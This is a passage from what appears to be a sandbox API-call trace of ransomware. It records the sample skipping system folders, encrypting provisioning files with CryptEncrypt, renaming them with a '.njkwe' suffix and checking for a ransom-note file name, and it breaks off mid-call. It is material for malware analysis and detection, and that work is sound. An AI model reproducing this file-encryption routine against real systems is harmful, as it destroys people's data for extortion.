0x1154032 [0078.743] GetTickCount () returned 0x1154032 [0078.743] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.743] GetProcessHeap () returned 0xbe0000 [0078.743] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.743] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x37c, lpOverlapped=0x0) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.745] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x37c, lpOverlapped=0x0) returned 1 [0078.745] GetProcessHeap () returned 0xbe0000 [0078.745] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.745] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.745] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.745] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.745] CloseHandle (hObject=0x43c) returned 1 [0078.745] GetProcessHeap () returned 0xbe0000 [0078.745] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.745] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\379__connections_cellular_telenor (serbia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\379__connections_cellular_telenor (serbia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.746] GetProcessHeap () returned 0xbe0000 [0078.746] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.746] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901fba3a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901fba3a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901fba3a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", cAlternateFileName="37__CO~1.PRO")) returned 1 [0078.746] lstrcmpiW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.746] lstrcmpiW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.746] lstrcmpiW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.746] lstrcmpiW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.746] lstrcmpiW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.746] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml") returned 157 [0078.746] StrStrIW (lpFirst="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.746] lstrcmpW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.746] lstrcmpW (lpString1="37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.746] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\37__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\37__connections_cellular_best (belarus)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.750] GetTickCount () returned 0x1154041 [0078.750] GetTickCount () returned 0x1154041 [0078.750] GetTickCount () returned 0x1154041 [0078.750] GetTickCount () returned 0x1154041 [0078.750] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.750] GetProcessHeap () returned 0xbe0000 [0078.750] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.750] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0078.752] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.752] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0078.753] GetProcessHeap () returned 0xbe0000 [0078.753] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.753] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.753] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.753] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.753] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.753] CloseHandle (hObject=0x43c) returned 1 [0078.753] GetProcessHeap () returned 0xbe0000 [0078.753] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.753] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0078.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\37__connections_cellular_best (belarus)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\37__Connections_Cellular_BeST (Belarus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\37__connections_cellular_best (belarus)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.754] GetProcessHeap () returned 0xbe0000 [0078.754] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.754] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90de7bce, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90de7bce, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90de7bce, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="380__C~1.PRO")) returned 1 [0078.754] lstrcmpiW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.754] lstrcmpiW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.755] lstrcmpiW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.755] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.755] StrStrIW (lpFirst="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.755] lstrcmpW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.755] lstrcmpW (lpString1="380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.755] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\380__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.755] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\380__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.755] GetTickCount () returned 0x1154041 [0078.755] GetTickCount () returned 0x1154041 [0078.755] GetTickCount () returned 0x1154041 [0078.755] GetTickCount () returned 0x1154041 [0078.755] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.755] GetProcessHeap () returned 0xbe0000 [0078.755] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.755] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1cd, lpOverlapped=0x0) returned 1 [0078.756] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.756] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1cd, lpOverlapped=0x0) returned 1 [0078.757] GetProcessHeap () returned 0xbe0000 [0078.757] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.757] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.757] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.758] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.758] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.758] CloseHandle (hObject=0x43c) returned 1 [0078.758] GetProcessHeap () returned 0xbe0000 [0078.758] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.758] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\380__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\380__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\380__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.759] GetProcessHeap () returned 0xbe0000 [0078.759] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.759] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90de7bce, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90de7bce, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90de7bce, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x31e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", cAlternateFileName="381__C~1.PRO")) returned 1 [0078.759] lstrcmpiW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.759] lstrcmpiW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.759] lstrcmpiW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.759] lstrcmpiW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.759] lstrcmpiW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.759] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml") returned 180 [0078.759] StrStrIW (lpFirst="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.759] lstrcmpW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.759] lstrcmpW (lpString1="381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.759] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\381__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\381__connections_cellular_vip mobile rs (serbia (republic of))_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.760] GetTickCount () returned 0x1154041 [0078.760] GetTickCount () returned 0x1154041 [0078.760] GetTickCount () returned 0x1154041 [0078.760] GetTickCount () returned 0x1154041 [0078.760] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.760] GetProcessHeap () returned 0xbe0000 [0078.760] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.760] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x31e, lpOverlapped=0x0) returned 1 [0078.762] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffce2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.762] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x31e, lpOverlapped=0x0) returned 1 [0078.762] GetProcessHeap () returned 0xbe0000 [0078.762] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.762] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.762] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.762] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.763] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.763] CloseHandle (hObject=0x43c) returned 1 [0078.763] GetProcessHeap () returned 0xbe0000 [0078.763] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.763] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 200 [0078.763] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\381__connections_cellular_vip mobile rs (serbia (republic of))_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\381__Connections_Cellular_Vip Mobile RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\381__connections_cellular_vip mobile rs (serbia (republic of))_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.763] GetProcessHeap () returned 0xbe0000 [0078.763] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.764] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90de7bce, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90de7bce, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90de7bce, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", cAlternateFileName="382__C~1.PRO")) returned 1 [0078.764] lstrcmpiW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.764] lstrcmpiW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.764] lstrcmpiW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.764] lstrcmpiW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.764] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml") returned 165 [0078.764] StrStrIW (lpFirst="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.764] lstrcmpW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", 